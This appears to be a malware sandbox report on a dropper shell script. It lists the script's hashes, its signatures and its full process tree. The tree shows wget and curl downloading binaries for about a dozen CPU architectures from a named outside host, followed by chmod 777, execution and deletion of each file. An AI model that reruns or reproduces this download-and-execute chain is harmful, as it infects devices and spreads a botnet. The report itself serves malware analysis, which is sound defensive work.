072a6dc8a7e9fb53b59013d0f1acd7e0f400e5ef77f264a7d4f85be4fde125c7

Analysis

max time kernel
45s
max time network
46s
platform
debian-9_mipsel
resource
debian9-mipsel-20240611-en
resource tags

arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
15/07/2024, 14:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh
Size

2KB
MD5

1ffa7d5e3a236cf0d6981d07e1b90406
SHA1

9bdae03e2410b108144841c466d1e769fea3a9ce
SHA256

69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4
SHA512

6f2aea4615c2f2cf06fc7dd92d9dd24f8b79d3a89d9fb17a35dcd9170ed12f7b5c238ee64b99dfd19686cdccfca62580a4285cedbad11e4cc39315e0f8bba284

Score

3^/10

Malware Config

Signatures

Reads runtime system information 14 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/busybox	cp

/tmp/69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh
/tmp/69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh
1⤵
PID:700
- /bin/cp
  cp /bin/busybox /tmp/
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:702
- /usr/bin/wget
  wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i486
  2⤵
  PID:706
- /usr/bin/curl
  curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i486
  2⤵
  - Reads runtime system information
  PID:724
- /bin/chmod
  chmod 777 daddyl33tpiss.i486
  2⤵
  PID:730
- /tmp/daddyl33tpiss.i486
  ./daddyl33tpiss.i486 Retard.i486.wget
  2⤵
  PID:731
- /bin/rm
  rm -rf daddyl33tpiss.i486
  2⤵
  PID:732
- /usr/bin/wget
  wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.x86_64
  2⤵
  PID:733
- /usr/bin/curl
  curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.x86_64
  2⤵
  - Reads runtime system information
  PID:735
- /bin/chmod
  chmod 777 daddyl33tpiss.x86_64
  2⤵
  PID:737
- /tmp/daddyl33tpiss.x86_64
  ./daddyl33tpiss.x86_64 Retard.x86_64.wget
  2⤵
  PID:738
- /bin/rm
  rm -rf daddyl33tpiss.x86_64
  2⤵
  PID:739
- /usr/bin/wget
  wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i586
  2⤵
  PID:740
- /usr/bin/curl
  curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i586
  2⤵
  - Reads runtime system information
  PID:741
- /bin/chmod
  chmod 777 daddyl33tpiss.i586
  2⤵
  PID:743
- /tmp/daddyl33tpiss.i586
  ./daddyl33tpiss.i586 Retard.i586.wget
  2⤵
  PID:744
- /bin/rm
  rm -rf daddyl33tpiss.i586
  2⤵
  PID:745
- /usr/bin/wget
  wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i686
  2⤵
  PID:746
- /usr/bin/curl
  curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i686
  2⤵
  - Reads runtime system information
  PID:747
- /bin/chmod
  chmod 777 daddyl33tpiss.i686
  2⤵
  PID:749
- /tmp/daddyl33tpiss.i686
  ./daddyl33tpiss.i686 Retard.i686.wget
  2⤵
  PID:750
- /bin/rm
  rm -rf daddyl33tpiss.i686
  2⤵
  PID:751
- /usr/bin/wget
  wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.mips
  2⤵
  PID:752
- /usr/bin/curl
  curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.mips
  2⤵
  - Reads runtime system information
  PID:757
- /bin/chmod
  chmod 777 daddyl33tpiss.mips
  2⤵
  PID:763
- /tmp/daddyl33tpiss.mips
  ./daddyl33tpiss.mips Retard.mips.wget
  2⤵
  PID:766
- /bin/rm
  rm -rf daddyl33tpiss.mips
  2⤵
  PID:767
- /usr/bin/wget
  wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.mipsel
  2⤵
  PID:768
- /usr/bin/curl
  curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.mipsel
  2⤵
  - Reads runtime system information
  PID:776
- /bin/chmod
  chmod 777 daddyl33tpiss.mipsel
  2⤵
  PID:783
- /tmp/daddyl33tpiss.mipsel
  ./daddyl33tpiss.mipsel Retard.mipsel.wget
  2⤵
  PID:784
- /bin/rm
  rm -rf daddyl33tpiss.mipsel
  2⤵
  PID:787
- /usr/bin/wget
  wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.arm
  2⤵
  PID:788
- /usr/bin/curl
  curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.arm
  2⤵
  - Reads runtime system information
  PID:797
- /bin/chmod
  chmod 777 daddyl33tpiss.arm
  2⤵
  PID:807
- /tmp/daddyl33tpiss.arm
  ./daddyl33tpiss.arm Retard.arm.wget
  2⤵
  PID:808
- /bin/rm
  rm -rf daddyl33tpiss.arm
  2⤵
  PID:811
- /usr/bin/wget
  wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.arm5
  2⤵
  PID:812
- /usr/bin/curl
  curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.arm5
  2⤵
  - Reads runtime system information
  PID:816
- /bin/chmod
  chmod 777 daddyl33tpiss.arm5
  2⤵
  PID:818
- /tmp/daddyl33tpiss.arm5
  ./daddyl33tpiss.arm5 Retard.arm5.wget
  2⤵
  PID:819
- /bin/rm
  rm -rf daddyl33tpiss.arm5
  2⤵
  PID:820
- /usr/bin/wget
  wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.arm6
  2⤵
  PID:821
- /usr/bin/curl
  curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.arm6
  2⤵
  - Reads runtime system information
  PID:822
- /bin/chmod
  chmod 777 daddyl33tpiss.arm6
  2⤵
  PID:827
- /tmp/daddyl33tpiss.arm6
  ./daddyl33tpiss.arm6 Retard.arm6.wget
  2⤵
  PID:828
- /bin/rm
  rm -rf daddyl33tpiss.arm6
  2⤵
  PID:829
- /usr/bin/wget
  wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.arm7
  2⤵
  PID:830
- /usr/bin/curl
  curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.arm7
  2⤵
  - Reads runtime system information
  PID:831
- /bin/chmod
  chmod 777 daddyl33tpiss.arm7
  2⤵
  PID:833
- /tmp/daddyl33tpiss.arm7
  ./daddyl33tpiss.arm7 Retard.arm7.wget
  2⤵
  PID:834
- /bin/rm
  rm -rf daddyl33tpiss.arm7
  2⤵
  PID:835
- /usr/bin/wget
  wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.ppc
  2⤵
  PID:836
- /usr/bin/curl
  curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.ppc
  2⤵
  - Reads runtime system information
  PID:841
- /bin/chmod
  chmod 777 daddyl33tpiss.ppc
  2⤵
  PID:849
- /tmp/daddyl33tpiss.ppc
  ./daddyl33tpiss.ppc Retard.ppc.wget
  2⤵
  PID:850
- /bin/rm
  rm -rf daddyl33tpiss.ppc
  2⤵
  PID:853
- /usr/bin/wget
  wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.m68k
  2⤵
  PID:854
- /usr/bin/curl
  curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.m68k
  2⤵
  - Reads runtime system information
  PID:863
- /bin/chmod
  chmod 777 daddyl33tpiss.m68k
  2⤵
  PID:869
- /tmp/daddyl33tpiss.m68k
  ./daddyl33tpiss.m68k Retard.m68k.wget
  2⤵
  PID:872
- /bin/rm
  rm -rf daddyl33tpiss.m68k
  2⤵
  PID:873
- /usr/bin/wget
  wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.sh4
  2⤵
  PID:874
- /usr/bin/curl
  curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.sh4
  2⤵
  - Reads runtime system information
  PID:879
- /bin/chmod
  chmod 777 daddyl33tpiss.sh4
  2⤵
  PID:881
- /tmp/daddyl33tpiss.sh4
  ./daddyl33tpiss.sh4 Retard.sh4.wget
  2⤵
  PID:882
- /bin/rm
  rm -rf daddyl33tpiss.sh4
  2⤵
  PID:883

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/busybox

Filesize
857KB

MD5
6ffc46165b5d9726a6607f3ea5305589

SHA1
ab127220f42e816b413dde0d17031e251a7bc98f

SHA256
80d636e2f1237e9adc9ea0bf7f42b17d7df8781db0684c33696411e50588a38c

SHA512
456fcd5d5bda524ef5236e00695a891cfefe15364f9c7a4ff04ad7dfdc7fd1726f037e905622216f13aee6c2d4ee90be0c850de82b3aac1d02a643db9f935af8

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads